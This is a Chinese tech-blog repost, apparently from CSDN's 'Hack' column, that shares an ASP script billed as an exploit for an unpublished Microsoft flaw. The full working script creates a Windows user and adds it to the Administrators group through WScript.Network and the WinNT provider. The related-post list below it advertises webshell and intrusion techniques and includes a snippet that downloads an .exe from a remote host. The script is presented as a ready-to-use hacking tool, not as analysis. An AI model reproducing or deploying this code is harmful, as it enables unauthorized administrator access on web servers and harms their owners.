蓝屏的原创添加超级用户的.asp代码

最新推荐文章于 2021-04-30 07:50:56 发布
最新推荐文章于 2021-04-30 07:50:56 发布
阅读量867 收藏
点赞数
分类专栏: Hack 文章标签: input user action 脚本 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dcboy/article/details/229834
版权
 [转载]蓝屏的原创添加超级用户的.asp代码 凯文改进 Ms未公布的漏洞


 信息来源:冰点论坛

作者:凯文 (kevin1986)

<head>.network对象脚本权限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用户:<input name="username" type="text" value="kevin1986"><br>
密码:<input name="passwd" type="password"><br>
  <input type="submit" Value="添 加">
</form>

<%@codepage=936%>
<%on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
  response.write "iP !s n0T RiGHt"
else
  if request("username")<>"" then
    username=request("username")
    passwd=request("passwd")
    Response.Expires=0
    Session.TimeOut=50
    Server.ScriptTimeout=3000
    set lp=Server.CreateObject("WSCRIPT.NETWORK")
    oz="WinNT://"&lp.ComputerName
    Set ob=GetObject(oz)
    Set oe=GetObject(oz&"/Administrators,group")
    Set od=ob.Create("user",username)
    od.SetPassword passwd
    od.SetInfo
    oe.Add oz&"/"&username
    if err then
        response.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……"
    else
        if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
          response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"
        else
          Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"
        end if
    end if
  else
    response.write "请输入输入用户名"
  end if
  end if
%>
Dcboy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
添加超级用户的.asp代码[蓝屏原创,凯文改进,Ms未公布的漏洞]
01-02
添加超级用户的.asp代码[蓝屏原创,凯文改进,Ms未公布的漏洞] 作者:蓝屏,凯文 文章来源:冰点极限其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了...
Windows系统如何建立隐藏的超级用户【转】
Midweek的专栏
03-17 460
对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE/SAM/SAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键
Linux给普通用户加超级用户权限的方法
walkintherose1836的专栏
05-25 2109
原作者:http://www.verydemo.com/demo_c167_i232377.html 问题 假设用户名为:ali 如果用户名没有超级用户权限,当输入 sudo + 命令 时, 系统提示: 代码如下: ali is not in the sudoers file.  This incident will be reported. 解决 1. 进入超级
linux下root切换普通用户,linux之普通用户与root用户之间切换方法
热门推荐
weixin_42502775的博客
04-30 1万+
linux之普通用户与root用户之间切换方法如下所示:以上就是小编为大家带来的linux之普通用户与root用户之间切换方法全部内容了,希望大家多多支持我们~时间: 2016-12-221. 首先进入单用户模式: 1). ubuntu : 上述情况可以在grub界面选择第二项修复,但没有grub可以参考: 1.重启ubuntu,随即长按shirft进入grub菜单: 2.选择recovery m...
Windows操作系统蓝屏代码分析指导书.docx
07-27
部分蓝屏代码分析,需要下载
蓝屏代码及解决方法.docx
05-18
蓝屏代码及解决方法
蓝屏代码查询器 2.1.3.zip
05-05
蓝屏代码查询器 2.1.3 中文免费版蓝屏代码查询器 2.1.3 中文免费版 1、重启 有时只是某个程序或驱动程序一时犯错,重启后它们会改过自新。 2、新硬件 首先,应该检查新硬件是否插牢,这个被许多人忽视的问题往往会...
DISCUZ漏洞与提升权限
DcBoy's Blog
12-17 6920
DISCUZ漏洞与提升权限这个漏洞是孟兄发现的,我在这里感谢他!也感谢ANGEL的分析!DISCUZ 2.2F的这个漏洞在register.php 的代码中:有如下代码: $email = trim($email); if(!$doublee && strstr($email, @)) {  $emailadd = "OR email=$email";}
cmd下载文件方法
DcBoy's Blog
12-30 5947
Set xPost = CreateObject("Microsoft.XMLHTTP")  xPost.Open "GET","http://www.xx.com/dc.exe",0   下载文件的地址xPost.Send()  Set sGet = CreateObject("ADODB.Stream")  sGet.Mode = 3  sGet.Type = 1  sGet.Open() 
在webshell下安全执行EXE程序
DcBoy's Blog
01-05 1866
有时候在WEBSHELL下面执行EXE程序常常会导致IIS崩溃有一种方法比较方便 首先查看系统时间time /T获得当前时间添加到at time xxx.exe用at命令查看任务是否被添加
突破TCP/IP筛选到3389终端登陆
DcBoy's Blog
12-29 1746
一:得到webshell今天晚上的一次小小测试,由于本人太菜,再高深的技术我也不会,只能这样了..........一切都已经过去了,没有办法补图了,希望能看的懂这个小帖子。今天有是无聊的一天,晚上实在无聊没有事情干,就到一个视频聊天站点看秀,嘿嘿~突然发现一个聊天室特别的火暴,人数已经有500人在里面了(满员了),刷了n次也没有进去..........更加郁闷了!:(想想反正也是没有事情做,测试一
当SA遇到XP_CMDSHELL时
DcBoy's Blog
12-30 1530
有时候在入侵的时候总是碰到先烦恼的问题,比如SA遇到xp_cmdshell时,如果管理员把xp_cmdshell删了怎么办呢?总是眼看着肉鸡跑了吧!今天我就对XP_CMDSHELL做一先解释,希望大家能看明白,能看懂众所周知,在MSSQL中,通过XP_cmdshell存储扩展,拥护具有sysadmin权限,用来执行系统任意命令但是那先网管也不是吃素的,都回把它删除,所以在SQL Injection
SQL常用命令使用方法
DcBoy's Blog
02-25 1266
1) 数据记录筛选: sql="select * from 数据表 where 字段名=字段值 order by 字段名 [desc]" sql="select * from 数据表 where 字段名 like %字段值% order by 字段名 [desc]" sql="select top 10 * from 数据表 where 字段名 order by 字段名 [desc]" sql="
如何建立隐藏的超级用户
DcBoy's Blog
10-10 1114
前几天在某个网站看到了一篇介绍如何建立隐藏的超级用户的图文教程,给我了很大的启发,作者只说明了如何在本地图形界面下建立隐藏的超级用户,且作者说他无法在命令行下实现隐藏的超级用户的建立,于是我就开始自已摸索,刚开始时,我用reg.exe(3.0版)作为命令行下导出导入注册表文件的工具,但每次导入以后,建立的隐藏的超级用户总不能用,后来打开注册表查看,发现这个隐藏的超级用户的默认数据类型并没有被导入注
命令行安装终端服务
DcBoy's Blog
01-30 1044
首先,telnet到该机器上面(具体怎么样上去不需要我说了吧),然后在命令行下输入如下三行命令: c:/>echo [Components] > c:/aa c:/>echo TSEnable = on >>c:/aa c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/aa /q /r
ASP中各种数据库连接代码
DcBoy's Blog
11-16 1034
MS Access数据库连接 用DSN连接并且没有用户名和密码:set conn = Server.CreateObject("ADODB.Connection")conn.open "YourDSNName"%>用DSN连接并且有用户名和密码:set conn = Server.CreateObject("ADODB.Connection")conn.open "YourDSNNam
创建触发器
DcBoy's Blog
01-01 1012
create trigger trig_notic_UIon notic for insert,updateasupdate notic set memo=memo+where id in(select id from inserted) go/*trig_notic_UI  触发器名称 自定义notic 需要触发的表名memo 需要更新的字段id  是主键*/
android 百度地图闪退,Android使用百度地图出现闪退及定位时显示蓝屏问题的解决方法...
最新发布
05-25
4. 在定位时出现异常导致蓝屏,可以在代码添加异常捕获。 ``` try { // 定位操作 } catch (Exception e) { // 异常处理 } ``` 以上是Android使用百度地图出现闪退及定位时显示蓝屏问题的解决方法。如果仍然...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值